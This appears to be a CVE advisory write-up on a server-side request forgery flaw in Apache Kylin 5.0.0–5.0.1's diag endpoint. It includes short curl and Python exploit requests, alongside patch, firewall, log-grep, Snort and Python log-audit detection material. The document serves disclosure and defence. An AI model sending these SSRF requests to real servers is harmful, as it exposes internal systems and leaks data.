How the CVE Works:
The vulnerability exists in Apache Kylin versions 5.0.0 to 5.0.1, where an attacker with admin access can exploit the `/kylin/api/xxx/diag` endpoint to perform Server-Side Request Forgery (SSRF). By crafting malicious requests, the attacker forces the Kylin server to send unauthorized requests to internal systems hosting the same API. If the internal host exposes the `/kylin/api/xxx/diag` endpoint, sensitive information may be leaked. The attack requires admin privileges and depends on internal network exposure of the vulnerable API.
DailyCVE Form:
Platform: Apache Kylin
Version: 5.0.0 – 5.0.1
Vulnerability: SSRF
Severity: Low
Date: Mar 27, 2025
What Undercode Say:
Exploitation:
1. Curl Exploit:
curl -X GET "http://<target>/kylin/api/xxx/diag?url=http://internal-host/api/diag" -H "Authorization: Bearer <admin-token>"
2. Python Exploit:
import requests

url = "http://<target>/kylin/api/xxx/diag"
headers = {"Authorization": "Bearer <admin-token>"}
params = {"url": "http://internal-host/api/diag"}
response = requests.get(url, headers=headers, params=params)
print(response.text)
Mitigation:
1. Patch Upgrade:
# Upgrade to Kylin 5.0.2
wget https://downloads.apache.org/kylin/5.0.2/apache-kylin-5.0.2-bin.tar.gz
tar -xzf apache-kylin-5.0.2-bin.tar.gz
2. Network Restriction:
# Block internal API exposure via firewall
iptables -A INPUT -p tcp --dport 7070 -j DROP
3. Endpoint Hardening:
# Restrict API access in kylin.properties (properties files use '#' comments, not HTML comments)
security.diag.endpoint.restrict=true
Detection:
1. Log Analysis:
# Match any segment between /kylin/api/ and /diag; a bare '.' would only match one character
grep -E "/kylin/api/[^/]+/diag" /var/log/kylin/access.log | grep -v "127.0.0.1"
2. IDS Rule (Snort):
alert tcp any any -> any 7070 (msg:"Kylin SSRF Attempt"; content:"/kylin/api/"; content:"diag"; nocase; sid:10001;)
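As an added example (not code from the advisory or the Kylin project), the log check above carried further: it parses access-log lines, keeps only requests to the diag endpoint, extracts the `url` parameter and classifies where it points, so that diag calls aimed at loopback or private addresses stand out. It assumes common-log-format access logs and uses constructed sample lines; the `/kylin/api/system/diag` path in those lines is a constructed stand-in for the advisory's `/kylin/api/xxx/diag`.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines in common log format; not real Kylin output.
SAMPLE_LOG = """\
10.0.0.5 - admin [27/Mar/2025:10:01:02 +0000] "GET /kylin/api/system/diag?url=http%3A%2F%2F10.0.0.9%3A7070%2Fkylin%2Fapi%2Fsystem%2Fdiag HTTP/1.1" 200 512
10.0.0.5 - admin [27/Mar/2025:10:02:10 +0000] "GET /kylin/api/projects HTTP/1.1" 200 1024
203.0.113.7 - admin [27/Mar/2025:10:03:33 +0000] "GET /kylin/api/system/diag?url=http://127.0.0.1:7070/kylin/api/system/diag HTTP/1.1" 403 0
10.0.0.5 - analyst [27/Mar/2025:10:04:00 +0000] "GET /kylin/api/system/diag?url=https://downloads.apache.org/kylin/ HTTP/1.1" 200 77
"""

# client ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The advisory writes /kylin/api/xxx/diag; "xxx" is a placeholder, so it is wildcarded here
DIAG_PATH_RE = re.compile(r'^/kylin/api/[^/]+/diag(?:/|$)')


def classify_target(target_url: str) -> str:
    """'internal' for loopback/RFC1918/link-local IP literals, 'external' for other IP
    literals, 'unresolved' for hostnames (a real pipeline must resolve or allowlist them)."""
    host = urlparse(target_url).hostname or ''
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return 'unresolved'
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return 'internal'
    return 'external'


def audit_diag_requests(log_text: str) -> list:
    """One record per 'url' parameter seen on a diag request, with its verdict."""
    records = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        request = urlparse(m['path'])
        if not DIAG_PATH_RE.match(request.path):
            continue
        # parse_qs percent-decodes, so encoded and plain targets are handled alike
        for target in parse_qs(request.query).get('url', []):
            records.append({'src': m['src'], 'user': m['user'], 'ts': m['ts'],
                            'status': int(m['status']), 'target': target,
                            'verdict': classify_target(target)})
    return records


def find_diag_ssrf(log_text: str) -> list:
    """Only the diag requests whose url parameter pointed at an internal address."""
    return [r for r in audit_diag_requests(log_text) if r['verdict'] == 'internal']
```

Requests with an 'unresolved' verdict are the ones a hostname allowlist or DNS resolution step must decide; the 403 on the second hit shows that blocked attempts still deserve a record, since they reveal who tried.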
References:
Reported By: https://github.com/advisories/GHSA-3v67-545x-ffc3